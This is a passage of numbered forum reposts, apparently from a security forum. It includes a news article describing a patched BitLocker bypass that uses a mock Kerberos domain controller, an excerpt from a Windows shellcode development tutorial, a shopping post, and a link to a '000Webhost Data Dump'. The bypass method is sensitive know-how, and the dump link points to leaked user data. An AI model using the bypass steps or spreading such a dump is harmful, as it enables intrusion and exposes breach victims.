therefore not resurface going forward. Sursa: https://grahamcluley.com/2015/11/flaws-lastpass-password-manager-security-researchers/
  21. Researcher Demonstrates Simple BitLocker Bypass By SecurityWeek News on November 18, 2015 BitLocker, the disk encryption solution implemented in the Windows operating system starting with Windows Vista, does not require sophisticated tools or exploits to be bypassed on systems that do not have the latest patches from Microsoft installed, security researcher Ian Haken claims. With the help of BitLocker, users can lock their entire computer with full-disk encryption, thus ensuring that an attacker cannot access data. BitLocker is available on professional and enterprise versions of Windows and was also designed to protect the pre-boot process from modification using the Trusted Platform Module (TPM), which is also being used to safely store its secret key for the full-disk encryption. A TPM is a hardware chip designed to perform cryptographic operations and to store secrets, and its use enables BitLocker to decrypt the operating system partition on boot without requiring pre-boot authentication. However, there is the option to require pre-boot authentication, meaning that the user has to supply a PIN or insert a USB key containing a saved secret key. One of the Security Support Providers (SSPs) in Windows is Kerberos, and Ian Haken, a researcher at security firm Synopsys, discovered a vulnerability that could allow an attacker to bypass the Kerberos authentication and to decrypt drives encrypted with BitLocker. For the exploit to be successful, however, BitLocker on the target system has to be enabled without a PIN or USB key (pre-boot authentication), the machine should be domain-joined, and the attacker needs physical access to it. To bypass authentication, Haken explained that the attacker needs to set up a Kerberos Key Distribution Center (KDC), needs control of the network communication and needs to direct communication to the attacker-controlled “mock" domain controller. 
By connecting the machine to the mock domain controller (DC), the attacker can trigger a password reset action, thus gaining access to the encrypted drives. According to the researcher, in this scenario, the attacker does not know the user password and the machine password, although it controls both the Windows login screen and the mock DC account database where they will be setting a new user password. To be successful, the attacker needs to trigger the password change Kerberos protocol by setting the mock DC to inform the workstation that the user password has expired. According to Haken, the DC does not have to provide authentication and the workstation prompts the user for a new password, thus allowing the attacker to initiate the exchange. Since the new password is not present on the DC, the login attempt will fail, but the attacker gains access to the machine by disabling network communication, which results in the workstation reverting to local account credentials, now known to the attacker. “This attack is 100% reliable on affected systems, is not sophisticated (no custom tool was developed, no patches to Samba were necessary, and it was executed with just a few shell commands), and can be executed in a matter of seconds. Configuring Samba manually, this can be done in under a minute. If a tool was written to respond automatically based on DNS/Kerberos requests (thus automatically determining the domain/realm and the username), this could be used to bypass the login screen in a matter of seconds,” the researcher explained. Microsoft resolved the vulnerability in last week’s set of patches (Patch Tuesday) by adding an additional authentication check and claims that it was unaware of any attack attempting to exploit this bypass at the time the fix was released. The issue was found to affect all Windows versions from Windows Vista Service Pack 2 onwards, except for Windows RT or Windows RT 8.1, the company explains in a security bulletin. 
Sursa: Researcher Demonstrates Simple BitLocker Bypass | SecurityWeek.Com
  22. Thanks, technically speaking, it contains nothing. In practice, part II doesn't cover "shellcodes" either, but in part III, I hope, many will be able to understand how they are written.
  23. Introduction to Windows shellcode development – Part 1 October 30, 2015 Ionut Popescu This article contains an overview of shellcode development techniques and their specific aspects. Understanding these concepts allows you to write your own shellcode. Furthermore, you could modify existing exploits that contain already made shellcode to perform custom functionality that you need. Introduction Let’s say you have a working exploit in Internet Explorer or Flash Player that opens calc.exe. This isn’t really useful, is it? What you really want is to execute some remote commands or to do other useful functionality. In this situation you may want to use standard existing shellcode such as the ones from the Shell Storm database or generated by Metasploit’s msfvenom tool. However, you must first understand the basic principles of shellcoding so you can use them effectively in your exploits. Article: http://securitycafe.ro/2015/10/30/introduction-to-windows-shellcode-development-part1/
  24. Nytro

    Domo discounts

    Link: Offer: we're giving it all away, 13 November - DOMO.ro Info: Domo will close all its stores - sources - IT - HotNews.ro Edit: Nothing special.
  25. 000Webhost Data Dump https://000webhost.thecthulhu.com/